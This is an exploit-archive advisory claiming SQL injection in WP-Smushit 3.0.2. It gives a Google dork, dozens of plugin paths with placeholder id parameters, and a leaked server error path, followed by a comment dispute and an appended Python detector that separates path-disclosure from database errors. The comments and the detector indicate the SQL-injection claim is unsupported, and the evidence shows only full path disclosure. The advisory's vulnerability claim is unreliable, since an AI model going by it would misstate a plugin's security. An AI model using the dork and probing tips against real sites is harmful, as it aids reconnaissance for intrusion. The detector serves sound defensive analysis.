WordPress WP-Smushit 3.0.2 SQL Injection

Posted Jan 28, 2019
Authored by KingSkrupellos

WordPress WP-Smushit plugin version 3.0.2 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | c78331279d3b80174b45eed706b9c31b

####################################################################

# Exploit Title : WordPress WP-Smushit Plugins 3.0.2 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 28/01/2019
# Vendor Homepage : premium.wpmudev.org
# Software Download Link : downloads.wordpress.org/plugin/wp-smushit.3.0.2.zip
# Software Information Link : wordpress.org/plugins/wp-smushit/
# Software Version : 3.0.2
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/wp-smushit/''
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

####################################################################

# Description about Software :
**********************************

WordPress WP-Smushit - Smush Image Compression and Optimization Plugin =>

Smush has been benchmarked and tested number one for speed and quality and is the award-winning, back-to-back proven crowd favorite image optimization plugin for WordPress. Resize, optimize, optimise and compress all of your images with the incredibly powerful and 100% free WordPress image smusher, brought to you by the superteam at WPMU DEV!

####################################################################

# Impact :
**********

* WordPress WP-Smushit Plugins 3.0.2 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

* Exploiting this issue could allow an attacker to compromise the application, read, access or modify data, or exploit latent vulnerabilities in the underlying database. If the webserver is misconfigured, read & write access to the filesystem may be possible.

####################################################################

# SQL Injection Exploit :
**********************

/wp-content/plugins/wp-smushit/app/class-wp-smush-dashboard.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/class-wp-smush-nextgen.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/views/meta-boxes/bulk-settings/meta-box.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/views/meta-boxes/bulk/meta-box-header.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/views/meta-boxes/bulk/meta-box.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/views/meta-boxes/cdn/meta-box-footer.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/views/meta-boxes/cdn/meta-box.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/views/meta-boxes/cdn/upsell-meta-box-header.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/views/meta-boxes/directory/meta-box.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/views/meta-boxes/integrations/meta-box.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/views/meta-boxes/nextgen/meta-box-header.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/views/meta-boxes/nextgen/meta-box.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/views/meta-boxes/nextgen/summary-meta-box.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/views/meta-boxes/pro-features/meta-box-header.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/views/meta-boxes/pro-features/meta-box.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/views/meta-boxes/settings/meta-box.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/views/meta-boxes/summary/meta-box.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/views/modals/directory-list.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/views/modals/quick-setup.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/views/smush-page.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/views/tabs.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/app/views/wp-smush-nextgen-bulk-page.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/core/external/free-dashboard/module.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/core/integrations/class-wp-smush-nextgen.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/core/integrations/class-wp-smush-gutenberg.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/core/integrations/class-wp-smush-s3.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/core/integrations/nextgen/class-wp-smush-nextgen-admin.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/core/integrations/nextgen/class-wp-smush-nextgen-stats.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/core/integrations/s3/class-wp-smush-s3-compat.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/core/modules/class-wp-smush-ajax.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/core/modules/class-wp-smush-async-editor.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/core/modules/class-wp-smush-backup.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/core/modules/class-wp-smush-cdn.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/core/modules/class-wp-smush-png2jpg.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/core/modules/class-wp-smush-resize.php?id=[SQL Injection]
/wp-content/plugins/wp-smushit/core/modules/class-wp-smushit.php?id=[SQL Injection]

####################################################################

# Example Vulnerable Sites :
*************************

####################################################################

# Example SQL Database Error :
****************************

Fatal error: Uncaught Error: Call to undefined function esc_html__() in
/home/brewurbancafe/public_html/wp-content/plugins/wp-smushit/app/views
/blocks/progress-bar.php:17 Stack trace: #0 {main} thrown in /home
/brewurbancafe/public_html/wp-content/plugins/wp-smushit/app/views
/blocks/progress-bar.php on line 17

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################

Comments (3)

gilzow

*NOT* a SQL Injection. This is a fullpath disclosure vulnerability. Completely different.

Comment by gilzow, 2019-02-01 18:45:25 UTC
kingskrupellos

OK. I'll fix it for the next time, gilzow. Thanks. According to the OWASP Security Research Center, Full Path Disclosure vulnerabilities enable the attacker to see the path to the webroot/file, e.g. /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() query (within a SQL Injection) to view the page source, require the attacker to have the full path to the file they wish to view. Reference Link : owasp.org/index.php/Full_Path_Disclosure

There is not only path disclosure; there are many errors such as Strict Standards, Fatal Error, "You have an error in your SQL syntax", etc. That's why I put SQL injection in the title. On the other hand, I know, but I thought a lot about what kind of title I could give this vuln, and finally I decided to title it SQL Injection. Next time I'll title my discoveries such as [ WordPress WP-Smushit Plugins 3.0.2 SQL Injection ] as full path disclosure. I couldn't find the true CWE number. You are right. But this can be SQL injection, too, because of the [ You have an error in your SQL syntax ] errors.

For the Full Path Disclosure: by injecting unexpected data into a parameter, it's possible to generate an error that will reveal the full path of the script. A remote user can determine the full path to the web root directory and other potentially sensitive information. To put it simply, Full Path Disclosure (FPD) is the revelation of the full path of a given file. FPD is performed by causing an error within a targeted website, which in turn spits out an error message for an attacker to see. FPD vulnerabilities are generally looked upon as low risk and are too often overlooked by web-masters as nothing to worry about. While FPD vulnerabilities are low risk, they can be used in conjunction with other exploiting techniques and can often be the key to a successful hack. There are a number of ways to test for FPD vulnerabilities, each of which takes little time.

The first method is to find a page that calls from an array, for example: index.php?page=home. To check this for a vulnerability, one would add an inoperable value to the URL. There are a number of ways to do this, the most effective of which would be to add open and closed square brackets [] to the end of the page value; this makes the call for the page defunct. The URL for this example would be index.php?page[]=home. This method would produce such errors as:

Warning: opendir(Array): failed to open dir: No such file or directory in /home/www/example/kei/photo/index.php on line 297
Warning: pg_num_rows(): supplied argument is not a valid PostgreSQL result resource in /usr/home/example/html/pie/index.php on line 131.

FPD can also be used to reveal the underlying operating system by observing the file paths. Windows, for instance, always starts with a drive letter, e.g. C:\, while Unix-based operating systems tend to start with a single forward slash.

Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/alice/public_html/includes/functions.php on line 2
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in C:\Users\bob\public_html\includes\functions.php on line 2

FPD may reveal a lot more than people normally might suspect. The two examples above reveal usernames on the operating systems as well: "alice" and "bob". Usernames are of course important pieces of credentials. Attackers can use those in many different ways, ranging from bruteforcing over various protocols (SSH, Telnet, RDP, FTP...) to launching exploits requiring working usernames. If you add one comment on any topic, I understand it. But please do not comment on every title [ This is not SQL inj but full path disclosure. ]. By the way, thank you for your comprehension.

Reference Link for SQL injection => cwe.mitre.org/data/definitions/89.html The software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. This can be used to alter query logic to bypass security checks, or to insert additional statements that modify the back-end database, possibly including execution of system commands. SQL injection has become a common issue with database-driven web sites. The flaw is easily detected, and easily exploited, and as such, any site or software package with even a minimal user base is likely to be subject to an attempted attack of this kind. This flaw depends on the fact that SQL makes no real distinction between the control and data planes.

For example, I got this error message => Strict Standards: Non-static method JLoader::import() should not be called statically in on line 34. According to Inmotionhosting, this is not an actual 'error' message but merely an informational message meant more for developers. It does not mean that code needs to be altered in your script.

SQL injection (SQLi) is an application security weakness that allows attackers to control an application's database (letting them access or delete data, change an application's data-driven behavior, and do other undesirable things) by tricking the application into sending unexpected SQL commands. SQL injection weaknesses occur when an application uses untrusted data, such as data entered into web form fields, as part of a database query. When an application fails to properly sanitize this untrusted data before adding it to a SQL query, an attacker can include their own SQL commands which the database will execute. Attackers provide specially-crafted input to trick an application into modifying the SQL queries that the application asks the database to execute. This allows the attacker to:

- Control application behavior that's based on data in the database, for example by tricking an application into allowing a login without a valid password
- Alter data in the database without authorization, for example by creating fraudulent records, adding users or "promoting" users to higher access levels, or deleting data
- Access data without authorization, for example by tricking the database into providing too many results for a query

I put this vuln. as SQL injection because this error may show [ Fatal error: Uncaught exception .... ] MSAccess (Apache PHP). So for example you can check here => securityidiots.com/Web-Pentest/SQL-Injection/Part-2-Basic-of-SQL-for-SQLi.html

MySQL Error Style: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
MSSQL ASPX Error: Server Error in '/' Application
MSAccess (Apache PHP): Fatal error: Uncaught exception 'com_exception' with message Source: Microsoft JET Database Engine
MSAccess (IIS ASP): Microsoft JET Database Engine error '80040e14'
Oracle Error: ORA-00933: SQL command not properly ended
ODBC Error: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
PostgreSQL Error: PSQLException: ERROR: unterminated quoted string at or near "'" Position: 1 or Query failed: ERROR: syntax error at or near "'" at character 56 in /www/site/test.php on line 121.
MS SQL Server Error: Microsoft SQL Native Client error '80040e14' Unclosed quotation mark after the character string.

That's all I want to say. Thank you for your comprehension.

Comment by kingskrupellos, 2019-02-02 21:40:23 UTC
kingskrupellos

Dear friend gilzow, this is SQL Injection. IBMCloud has proven that this is a SQL inj. vulnerability.
According to the IBMCloud => WP-Smushit Plugin for WordPress is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements to various scripts using the id parameter to view, add, modify or delete information in the back-end database.
CVSS 3.0 Base Score 6.5 and CVSS 3.0 Temporal Score 6.3 and Exploitability is high.
Reference Links :
exchange.xforce.ibmcloud.com/vulnerabilities/156200
dl.packetstormsecurity.net/1901-exploits/wpsmushit302-sql.txt
Screenshot from IBMCloud => cdn.pbrd.co/images/I0PZnjF.png
As you said - This is a Full Path Disclosure, too.
But I wanted to draw attention only for SQL Inj Vuln.
That's it. Believe or don't believe - this is the reality.

Comment by kingskrupellos, 2019-02-12 15:54:33 UTC
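The thread above turns on whether the quoted error is a SQL-injection error or a full path disclosure. The following is an added example (not code from the advisory, the comments or the plugin) that sorts a response body by the same evidence the participants cite: a disclosed filesystem path versus the database error signatures kingskrupellos lists. Sample bodies, the host name and the account names are constructed.

```python
"""Sort a PHP error page into full path disclosure (FPD), database error, or both.

Added example for this page, not code from the advisory or the plugin. The error
quoted in the advisory is a PHP fatal error: the view file was requested directly,
outside the WordPress bootstrap, so esc_html__() is undefined. It leaks a
filesystem path but no database error, which is what separates FPD from a
SQL-injection error. DB signatures follow the error styles quoted in the
comment thread; every sample body here is constructed.
"""
import re

# Filesystem paths of the kinds PHP warnings and fatal errors print.
PATH_RE = re.compile(r"(?:/(?:home|var|usr|srv|www|opt)/[\w./-]+\.php"
                     r"|[A-Za-z]:\\[\w\\. -]+\.php)")
# Account name from /home/<user>/... or C:\Users\<user>\...
USER_RE = re.compile(r"(?:^/home/|^[A-Za-z]:\\Users\\)([^/\\]+)")
# Database error signatures quoted in the comment thread (one per engine).
DB_ERROR_RES = [
    re.compile(r"You have an error in your SQL syntax", re.I),                # MySQL
    re.compile(r"Microsoft JET Database Engine", re.I),                       # MS Access
    re.compile(r"\bORA-\d{5}\b"),                                             # Oracle
    re.compile(r"OLE DB Provider for ODBC Drivers", re.I),                    # ODBC
    re.compile(r"PSQLException|syntax error at or near", re.I),               # PostgreSQL
    re.compile(r"Unclosed quotation mark after the character string", re.I),  # MS SQL Server
]

def extract_paths(body):
    """Return the distinct filesystem paths disclosed in a response body."""
    return sorted(set(PATH_RE.findall(body)))

def classify(body):
    """Return 'fpd', 'sql_error', 'fpd+sql_error' or 'none' for a response body."""
    has_db = any(r.search(body) for r in DB_ERROR_RES)
    has_path = bool(extract_paths(body))
    if has_db and has_path:
        return "fpd+sql_error"
    if has_db:
        return "sql_error"
    return "fpd" if has_path else "none"

def path_facts(path):
    """What a leaked path tells an observer: OS family and, often, an account name."""
    os_family = "windows" if re.match(r"[A-Za-z]:\\", path) else "unix"
    m = USER_RE.match(path)
    return {"os": os_family, "user": m.group(1) if m else None}

# Constructed sample bodies; host name and account names are placeholders.
FPD_BODY = ("Fatal error: Uncaught Error: Call to undefined function esc_html__() in "
            "/home/example/public_html/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php:17")
MYSQL_BODY = ("You have an error in your SQL syntax; check the manual that corresponds to "
              "your MySQL server version for the right syntax to use near ''' at line 1")
PG_BODY = ("Query failed: ERROR: syntax error at or near \"'\" at character 56 "
           "in /www/site/test.php on line 121")
WIN_BODY = (r"Warning: session_start(): The session id contains illegal characters "
            r"in C:\Users\bob\public_html\includes\functions.php on line 2")
```

Run against the advisory's own error, `classify` returns `fpd`: the path and account name leak, but nothing in the body indicates a database query was reached at all.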